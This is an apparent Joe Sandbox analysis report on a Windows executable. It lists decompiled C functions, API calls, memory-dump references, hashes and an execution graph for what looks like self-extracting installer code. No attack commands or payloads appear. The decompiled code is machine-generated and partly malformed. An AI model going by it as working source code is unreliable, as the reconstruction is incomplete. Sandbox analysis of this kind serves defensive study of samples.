                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06569
                                                                                                                                                                                                                                            0x00a06542
                                                                                                                                                                                                                                            0x00a06587

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00A00000,000007D6,00000005), ref: 00A0652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00A00000,00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A06538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00A00000,00000000,00000547,00A019E0,00000000), ref: 00A06557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A06560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 71ff7e8038cc6171b5ceb3085fa76534bf7bbe49fa3392fd7a3ffb10a4f85817
                                                                                                                                                                                                                                            • Instruction ID: 81976681fc25a9ae96387ae433dbf976da7524f4d1ac4ba0e36828704a5462db
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71ff7e8038cc6171b5ceb3085fa76534bf7bbe49fa3392fd7a3ffb10a4f85817
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A201D67210061DBBDB109FA9BC48DBB7A6CEB99765F000125FE15A3190D7719D2286A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E00A065E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x00a065e8
                                                                                                                                                                                                                                            0x00a065ed
                                                                                                                                                                                                                                            0x00a065ef
                                                                                                                                                                                                                                            0x00a065f2
                                                                                                                                                                                                                                            0x00a065f4
                                                                                                                                                                                                                                            0x00a065f4
                                                                                                                                                                                                                                            0x00a065f6
                                                                                                                                                                                                                                            0x00a065f7
                                                                                                                                                                                                                                            0x00a06608
                                                                                                                                                                                                                                            0x00a06611
                                                                                                                                                                                                                                            0x00a06618
                                                                                                                                                                                                                                            0x00a0661c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0660e
                                                                                                                                                                                                                                            0x00a06623
                                                                                                                                                                                                                                            0x00a06625
                                                                                                                                                                                                                                            0x00a0663b
                                                                                                                                                                                                                                            0x00a0663b
                                                                                                                                                                                                                                            0x00a0663d
                                                                                                                                                                                                                                            0x00a06641
                                                                                                                                                                                                                                            0x00a06610
                                                                                                                                                                                                                                            0x00a06610
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a06610
                                                                                                                                                                                                                                            0x00a06644
                                                                                                                                                                                                                                            0x00a06647
                                                                                                                                                                                                                                            0x00a06647
                                                                                                                                                                                                                                            0x00a06621
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A02B33), ref: 00A06602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A06612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A06629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A06635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: 3919147fc9f0ee0fd6b932b287b99feeb91e6b4c74ea149252038810945d0b64
                                                                                                                                                                                                                                            • Instruction ID: b7de169663cbe2be6e2876d10e8a770f30c609194f13735f78a9a3fa6538ddae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3919147fc9f0ee0fd6b932b287b99feeb91e6b4c74ea149252038810945d0b64
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF028320046986EE7369B68AC988BBBF9CCF9B358F2902AFE49182041D6160D178661
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A069B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0xa081f8 = E00A06C70();
                                                                                                                                                                                                                                            				__set_app_type(E00A06FBE(2));
                                                                                                                                                                                                                                            				 *0xa088a4 =  *0xa088a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0xa088a8 =  *0xa088a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0xa08528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0xa0851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E00A07000();
                                                                                                                                                                                                                                            				if( *0xa08000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E00A07000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A071EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a069b7
                                                                                                                                                                                                                                            0x00a069c2
                                                                                                                                                                                                                                            0x00a069c8
                                                                                                                                                                                                                                            0x00a069cf
                                                                                                                                                                                                                                            0x00a069d8
                                                                                                                                                                                                                                            0x00a069de
                                                                                                                                                                                                                                            0x00a069e4
                                                                                                                                                                                                                                            0x00a069e6
                                                                                                                                                                                                                                            0x00a069ec
                                                                                                                                                                                                                                            0x00a069f2
                                                                                                                                                                                                                                            0x00a069f4
                                                                                                                                                                                                                                            0x00a06a00
                                                                                                                                                                                                                                            0x00a06a07
                                                                                                                                                                                                                                            0x00a06a0d
                                                                                                                                                                                                                                            0x00a06a0e
                                                                                                                                                                                                                                            0x00a06a15

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A06FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A06FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 00A069C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 00A069D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 00A069E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 00A06A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: efe0c7a6571f3c4316713ad3e23a42cddde096e7d56679a326fcb465badf385a
                                                                                                                                                                                                                                            • Instruction ID: 6be573366007048a4607bb670e9f72e0ec06662aad056e5e3acc2016e085a5db
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efe0c7a6571f3c4316713ad3e23a42cddde096e7d56679a326fcb465badf385a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40F0F87050830D8FD714EFB0BE4A6583B61FB18321B104629E4A2862F1CF3E95578A19
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:26.9%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:969
                                                                                                                                                                                                                                            Total number of Limit Nodes:42
                                                                                                                                                                                                                                            execution_graph 3128 a96bef _XcptFilter 2196 a94ca0 GlobalAlloc 2197 a96a60 2214 a97155 2197->2214 2199 a96a65 2200 a96a76 GetStartupInfoW 2199->2200 2201 a96a93 2200->2201 2202 a96aa8 2201->2202 2203 a96aaf Sleep 2201->2203 2204 a96ac7 _amsg_exit 2202->2204 2207 a96ad1 2202->2207 2203->2201 2204->2207 2205 a96b2e __IsNonwritableInCurrentImage 2209 a96bd6 _ismbblead 2205->2209 2210 a96c1e 2205->2210 2213 a96bbe exit 2205->2213 2219 a92bfb GetVersion 2205->2219 2206 a96b13 _initterm 2206->2205 2207->2205 2207->2206 2208 a96af4 2207->2208 2209->2205 2210->2208 2211 a96c27 _cexit 2210->2211 2211->2208 2213->2205 2215 a9717a 2214->2215 2216 a9717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 a971e2 2215->2217 2218 a971cd 2216->2218 2217->2199 2218->2217 2220 a92c0f 2219->2220 2221 a92c50 2219->2221 2220->2221 2222 a92c13 GetModuleHandleW 2220->2222 2236 a92caa memset memset memset 2221->2236 2222->2221 2225 a92c22 GetProcAddress 2222->2225 2225->2221 2233 a92c34 2225->2233 2226 a92c8e 2228 a92c9e 2226->2228 2229 a92c97 CloseHandle 2226->2229 2228->2205 2229->2228 2233->2221 2234 a92c89 2331 a91f90 2234->2331 2348 a9468f FindResourceA SizeofResource 2236->2348 2239 a92e30 2242 a944b9 20 API calls 2239->2242 2240 a92d2d CreateEventA SetEvent 2241 a9468f 7 API calls 2240->2241 2243 a92d57 2241->2243 2244 a92f06 2242->2244 2245 a92d5b 2243->2245 2246 a92d7d 2243->2246 2353 a96ce0 2244->2353 2358 a944b9 2245->2358 2248 a92e1f 2246->2248 2252 a9468f 7 API calls 2246->2252 2387 a95c9e 2248->2387 2250 a92d6e 2250->2244 2255 a92d9f 2252->2255 2253 a92c62 2253->2226 2277 a92f1d 2253->2277 2255->2245 2257 a92da3 CreateMutexA 2255->2257 2256 a92e3a 2258 a92e43 2256->2258 2259 a92e52 FindResourceA 2256->2259 2257->2248 2260 a92dbd GetLastError 2257->2260 2413 a92390 2258->2413 2261 a92e6e 2259->2261 2262 a92e64 LoadResource 2259->2262 2260->2248 2264 a92dca 2260->2264 2261->2250 2428 a936ee GetVersionExA 2261->2428 2262->2261 2265 a92dea 2264->2265 2266 a92dd5 2264->2266 2268 a944b9 20 API calls 2265->2268 2267 a944b9 20 API calls 2266->2267 2269 a92de8 2267->2269 2270 a92dff 2268->2270 2272 a92e04 CloseHandle 2269->2272 2270->2248 2270->2272 2272->2244 2278 a92f6c 2277->2278 2279 a92f3f 2277->2279 2572 a95164 2278->2572 2281 a92f5f 2279->2281 2552 a951e5 2279->2552 2705 a93a3f 2281->2705 2282 a92f71 2314 a93041 2282->2314 2587 a955a0 2282->2587 2289 a96ce0 4 API calls 2291 a92c6b 2289->2291 2290 a92f86 GetSystemDirectoryA 2292 a9658a CharPrevA 2290->2292 2318 a952b6 2291->2318 2293 a92fab LoadLibraryA 2292->2293 2294 a92fc0 GetProcAddress 2293->2294 2295 a92ff7 FreeLibrary 2293->2295 2294->2295 2296 a92fd6 DecryptFileA 2294->2296 2297 a93017 SetCurrentDirectoryA 2295->2297 2298 a93006 2295->2298 2296->2295 2308 a92ff0 2296->2308 2299 a93054 2297->2299 2300 a93026 2297->2300 2298->2297 2637 a9621e GetWindowsDirectoryA 2298->2637 2304 a93061 2299->2304 2648 a93b26 2299->2648 2302 a944b9 20 API calls 2300->2302 2307 a93037 2302->2307 2306 a9307a 2304->2306 2304->2314 2657 a9256d 2304->2657 2311 a93098 2306->2311 2668 a93ba2 2306->2668 2724 a96285 GetLastError 2307->2724 2308->2295 2311->2314 2316 a930af 2311->2316 2314->2289 2726 a94169 2316->2726 2319 a952d6 2318->2319 2325 a95316 2318->2325 2320 a95300 LocalFree LocalFree 2319->2320 2322 a952eb SetFileAttributesA DeleteFileA 2319->2322 2320->2319 2320->2325 2321 a9538c 2324 a96ce0 4 API calls 2321->2324 2322->2320 2323 a95374 2323->2321 3059 a91fe1 2323->3059 2327 a92c72 2324->2327 2325->2323 2328 a9535e SetCurrentDirectoryA 2325->2328 2329 a965e8 4 API calls 2325->2329 2327->2226 2327->2234 2330 a92390 13 API calls 2328->2330 2329->2328 2330->2323 2332 a91f9a 2331->2332 2333 a91f9f 2331->2333 2334 a91ea7 15 API calls 2332->2334 2335 a91fc0 2333->2335 2336 a944b9 20 API calls 2333->2336 2339 a91fd9 2333->2339 2334->2333 2337 a91ee2 GetCurrentProcess OpenProcessToken 2335->2337 2338 a91fcf ExitWindowsEx 2335->2338 2335->2339 2336->2335 2341 a91f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2337->2341 2343 a91f0e 2337->2343 2338->2339 2339->2226 2342 a91f6b ExitWindowsEx 2341->2342 2341->2343 2342->2343 2344 a91f1f 2342->2344 2345 a944b9 20 API calls 2343->2345 2346 a96ce0 4 API calls 2344->2346 2345->2344 2347 a91f8c 2346->2347 2347->2226 2349 a92d1a 2348->2349 2350 a946b6 2348->2350 2349->2239 2349->2240 2350->2349 2351 a946be FindResourceA LoadResource LockResource 2350->2351 2351->2349 2352 a946df memcpy_s FreeResource 2351->2352 2352->2349 2354 a96ce8 2353->2354 2355 a96ceb 2353->2355 2354->2253 2470 a96cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2355->2470 2357 a96e26 2357->2253 2359 a9455a 2358->2359 2360 a944fe LoadStringA 2358->2360 2364 a96ce0 4 API calls 2359->2364 2361 a94562 2360->2361 2362 a94527 2360->2362 2367 a945c9 2361->2367 2374 a9457e 2361->2374 2471 a9681f 2362->2471 2366 a94689 2364->2366 2366->2250 2370 a945cd LocalAlloc 2367->2370 2371 a94607 LocalAlloc 2367->2371 2368 a94536 MessageBoxA 2368->2359 2370->2359 2378 a945f3 2370->2378 2371->2359 2373 a945c4 2371->2373 2376 a9462d MessageBeep 2373->2376 2374->2374 2377 a94596 LocalAlloc 2374->2377 2379 a9681f 10 API calls 2376->2379 2377->2359 2380 a945af 2377->2380 2381 a9171e _vsnprintf 2378->2381 2382 a9463b 2379->2382 2488 a9171e 2380->2488 2381->2373 2384 a94645 MessageBoxA LocalFree 2382->2384 2385 a967c9 EnumResourceLanguagesA 2382->2385 2384->2359 2385->2384 2394 a95e17 2387->2394 2410 a95cc3 2387->2410 2388 a95dd0 2392 a95dec GetModuleFileNameA 2388->2392 2388->2394 2389 a96ce0 4 API calls 2391 a92e2c 2389->2391 2390 a95ced CharNextA 2390->2410 2391->2239 2391->2256 2393 a95e0a 2392->2393 2392->2394 2498 a966c8 2393->2498 2394->2389 2396 a96218 2507 a96e2a 2396->2507 2399 a95e36 CharUpperA 2400 a961d0 2399->2400 2399->2410 2401 a944b9 20 API calls 2400->2401 2402 a961e7 2401->2402 2403 a961f0 CloseHandle 2402->2403 2404 a961f7 ExitProcess 2402->2404 2403->2404 2405 a95f9f CharUpperA 2405->2410 2406 a95f59 CompareStringA 2406->2410 2407 a96003 CharUpperA 2407->2410 2408 a95edc CharUpperA 2408->2410 2409 a960a2 CharUpperA 2409->2410 2410->2388 2410->2390 2410->2394 2410->2396 2410->2399 2410->2405 2410->2406 2410->2407 2410->2408 2410->2409 2411 a9667f IsDBCSLeadByte CharNextA 2410->2411 2503 a9658a 2410->2503 2411->2410 2414 a924cb 2413->2414 2417 a923b9 2413->2417 2415 a96ce0 4 API calls 2414->2415 2416 a924dc 2415->2416 2416->2250 2417->2414 2418 a923e9 FindFirstFileA 2417->2418 2418->2414 2419 a92407 2418->2419 2420 a92479 2419->2420 2421 a92421 lstrcmpA 2419->2421 2422 a924a9 FindNextFileA 2419->2422 2426 a9658a CharPrevA 2419->2426 2427 a92390 5 API calls 2419->2427 2424 a92488 SetFileAttributesA DeleteFileA 2420->2424 2421->2422 2423 a92431 lstrcmpA 2421->2423 2422->2419 2425 a924bd FindClose RemoveDirectoryA 2422->2425 2423->2419 2423->2422 2424->2422 2425->2414 2426->2419 2427->2419 2429 a9372d 2428->2429 2433 a93737 2428->2433 2430 a944b9 20 API calls 2429->2430 2442 a939fc 2429->2442 2430->2442 2431 a96ce0 4 API calls 2432 a92e92 2431->2432 2432->2244 2432->2250 2443 a918a3 2432->2443 2433->2429 2435 a938a4 2433->2435 2433->2442 2514 a928e8 2433->2514 2435->2429 2436 a939c1 MessageBeep 2435->2436 2435->2442 2437 a9681f 10 API calls 2436->2437 2438 a939ce 2437->2438 2439 a939d8 MessageBoxA 2438->2439 2441 a967c9 EnumResourceLanguagesA 2438->2441 2439->2442 2441->2439 2442->2431 2444 a919b8 2443->2444 2445 a918d5 2443->2445 2447 a96ce0 4 API calls 2444->2447 2543 a917ee LoadLibraryA 2445->2543 2449 a919d5 2447->2449 2449->2250 2463 a96517 FindResourceA 2449->2463 2450 a918e5 GetCurrentProcess OpenProcessToken 2450->2444 2451 a91900 GetTokenInformation 2450->2451 2452 a91918 GetLastError 2451->2452 2453 a919aa CloseHandle 2451->2453 2452->2453 2454 a91927 LocalAlloc 2452->2454 2453->2444 2455 a919a9 2454->2455 2456 a91938 GetTokenInformation 2454->2456 2455->2453 2457 a9194e AllocateAndInitializeSid 2456->2457 2458 a919a2 LocalFree 2456->2458 2457->2458 2462 a9196e 2457->2462 2458->2455 2459 a91999 FreeSid 2459->2458 2460 a91975 EqualSid 2461 a9198c 2460->2461 2460->2462 2461->2459 2462->2459 2462->2460 2462->2461 2464 a9656b 2463->2464 2465 a96536 LoadResource 2463->2465 2467 a944b9 20 API calls 2464->2467 2465->2464 2466 a96544 DialogBoxIndirectParamA FreeResource 2465->2466 2466->2464 2468 a9657c 2466->2468 2467->2468 2468->2250 2470->2357 2472 a96857 GetVersionExA 2471->2472 2481 a9691a 2471->2481 2473 a9687c 2472->2473 2472->2481 2476 a968a5 GetSystemMetrics 2473->2476 2473->2481 2474 a96ce0 4 API calls 2475 a9452c 2474->2475 2475->2368 2482 a967c9 2475->2482 2477 a968b5 RegOpenKeyExA 2476->2477 2476->2481 2478 a968d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 a9690c 2478->2479 2478->2481 2492 a966f9 2479->2492 2481->2474 2483 a967e2 2482->2483 2486 a96803 2482->2486 2496 a96793 EnumResourceLanguagesA 2483->2496 2485 a967f5 2485->2486 2497 a96793 EnumResourceLanguagesA 2485->2497 2486->2368 2489 a9172d 2488->2489 2490 a9173d _vsnprintf 2489->2490 2491 a9175d 2489->2491 2490->2491 2491->2373 2494 a9670f 2492->2494 2493 a96740 CharNextA 2493->2494 2494->2493 2495 a9674b 2494->2495 2495->2481 2496->2485 2497->2486 2499 a966d5 2498->2499 2500 a966f3 2499->2500 2502 a966e5 CharNextA 2499->2502 2510 a96648 2499->2510 2500->2394 2502->2499 2504 a9659b 2503->2504 2504->2504 2505 a965b8 CharPrevA 2504->2505 2506 a965ab 2504->2506 2505->2506 2506->2410 2513 a96cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 a9621d 2511 a9665d IsDBCSLeadByte 2510->2511 2512 a96668 2510->2512 2511->2512 2512->2499 2513->2509 2515 a92a62 2514->2515 2522 a9290d 2514->2522 2516 a92a6e GlobalFree 2515->2516 2517 a92a75 2515->2517 2516->2517 2517->2435 2519 a92955 GlobalAlloc 2519->2515 2520 a92968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 a92a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 a92a80 GlobalUnlock 2522->2523 2524 a92773 2522->2524 2523->2515 2525 a927a3 CharUpperA CharNextA CharNextA 2524->2525 2526 a928b2 2524->2526 2527 a927db 2525->2527 2528 a928b7 GetSystemDirectoryA 2525->2528 2526->2528 2529 a928a8 GetWindowsDirectoryA 2527->2529 2530 a927e3 2527->2530 2531 a928bf 2528->2531 2529->2531 2535 a9658a CharPrevA 2530->2535 2532 a928d2 2531->2532 2533 a9658a CharPrevA 2531->2533 2534 a96ce0 4 API calls 2532->2534 2533->2532 2536 a928e2 2534->2536 2537 a92810 RegOpenKeyExA 2535->2537 2536->2522 2537->2531 2538 a92837 RegQueryValueExA 2537->2538 2539 a9289a RegCloseKey 2538->2539 2540 a9285c 2538->2540 2539->2531 2541 a92867 ExpandEnvironmentStringsA 2540->2541 2542 a9287a 2540->2542 2541->2542 2542->2539 2544 a91890 2543->2544 2545 a91826 GetProcAddress 2543->2545 2546 a96ce0 4 API calls 2544->2546 2547 a91889 FreeLibrary 2545->2547 2548 a91839 AllocateAndInitializeSid 2545->2548 2549 a9189f 2546->2549 2547->2544 2548->2547 2550 a9185f FreeSid 2548->2550 2549->2444 2549->2450 2550->2547 2553 a9468f 7 API calls 2552->2553 2554 a951f9 LocalAlloc 2553->2554 2555 a9522d 2554->2555 2556 a9520d 2554->2556 2558 a9468f 7 API calls 2555->2558 2557 a944b9 20 API calls 2556->2557 2559 a9521e 2557->2559 2560 a9523a 2558->2560 2561 a96285 GetLastError 2559->2561 2562 a9523e 2560->2562 2563 a95262 lstrcmpA 2560->2563 2571 a95223 2561->2571 2566 a944b9 20 API calls 2562->2566 2564 a9527e 2563->2564 2565 a95272 LocalFree 2563->2565 2569 a944b9 20 API calls 2564->2569 2568 a92f4d 2565->2568 2567 a9524f LocalFree 2566->2567 2567->2568 2568->2278 2568->2281 2568->2314 2570 a95290 LocalFree 2569->2570 2570->2571 2571->2568 2573 a9468f 7 API calls 2572->2573 2574 a95175 2573->2574 2575 a9517a 2574->2575 2576 a951af 2574->2576 2577 a944b9 20 API calls 2575->2577 2578 a9468f 7 API calls 2576->2578 2579 a9518d 2577->2579 2580 a951c0 2578->2580 2579->2282 2739 a96298 2580->2739 2584 a951ce 2586 a944b9 20 API calls 2584->2586 2585 a951e1 2585->2282 2586->2579 2588 a9468f 7 API calls 2587->2588 2589 a955c7 LocalAlloc 2588->2589 2590 a955db 2589->2590 2591 a955fd 2589->2591 2592 a944b9 20 API calls 2590->2592 2593 a9468f 7 API calls 2591->2593 2594 a955ec 2592->2594 2595 a9560a 2593->2595 2598 a96285 GetLastError 2594->2598 2596 a9560e 2595->2596 2597 a95632 lstrcmpA 2595->2597 2599 a944b9 20 API calls 2596->2599 2600 a9564b LocalFree 2597->2600 2601 a95645 2597->2601 2602 a955f1 2598->2602 2603 a9561f LocalFree 2599->2603 2604 a9565b 2600->2604 2605 a95696 2600->2605 2601->2600 2625 a955f6 2602->2625 2603->2625 2613 a95467 49 API calls 2604->2613 2606 a9589f 2605->2606 2607 a956ae GetTempPathA 2605->2607 2608 a96517 24 API calls 2606->2608 2611 a956eb 2607->2611 2612 a956c3 2607->2612 2608->2625 2609 a96ce0 4 API calls 2610 a92f7e 2609->2610 2610->2290 2610->2314 2619 a9586c GetWindowsDirectoryA 2611->2619 2620 a95717 GetDriveTypeA 2611->2620 2611->2625 2751 a95467 2612->2751 2615 a95678 2613->2615 2617 a95680 2615->2617 2615->2625 2618 a944b9 20 API calls 2617->2618 2618->2602 2785 a9597d GetCurrentDirectoryA SetCurrentDirectoryA 2619->2785 2623 a95730 GetFileAttributesA 2620->2623 2635 a9572b 2620->2635 2623->2635 2625->2609 2626 a95467 49 API calls 2626->2611 2627 a92630 21 API calls 2627->2635 2629 a957c1 GetWindowsDirectoryA 2629->2635 2630 a9597d 34 API calls 2630->2635 2631 a9658a CharPrevA 2632 a957e8 GetFileAttributesA 2631->2632 2633 a957fa CreateDirectoryA 2632->2633 2632->2635 2633->2635 2634 a95827 SetFileAttributesA 2634->2635 2635->2619 2635->2620 2635->2623 2635->2625 2635->2627 2635->2629 2635->2630 2635->2631 2635->2634 2636 a95467 49 API calls 2635->2636 2781 a96952 2635->2781 2636->2635 2638 a96249 2637->2638 2639 a96268 2637->2639 2640 a944b9 20 API calls 2638->2640 2641 a9597d 34 API calls 2639->2641 2642 a9625a 2640->2642 2643 a96277 2641->2643 2644 a96285 GetLastError 2642->2644 2645 a96ce0 4 API calls 2643->2645 2646 a9625f 2644->2646 2647 a93013 2645->2647 2646->2643 2647->2297 2647->2314 2649 a93b2d 2648->2649 2649->2649 2650 a93b72 2649->2650 2651 a93b53 2649->2651 2852 a94fe0 2650->2852 2653 a96517 24 API calls 2651->2653 2654 a93b70 2653->2654 2655 a93b7b 2654->2655 2656 a96298 10 API calls 2654->2656 2655->2304 2656->2655 2658 a92583 2657->2658 2659 a92622 2657->2659 2661 a925e8 RegOpenKeyExA 2658->2661 2662 a9258b 2658->2662 2906 a924e0 GetWindowsDirectoryA 2659->2906 2663 a92609 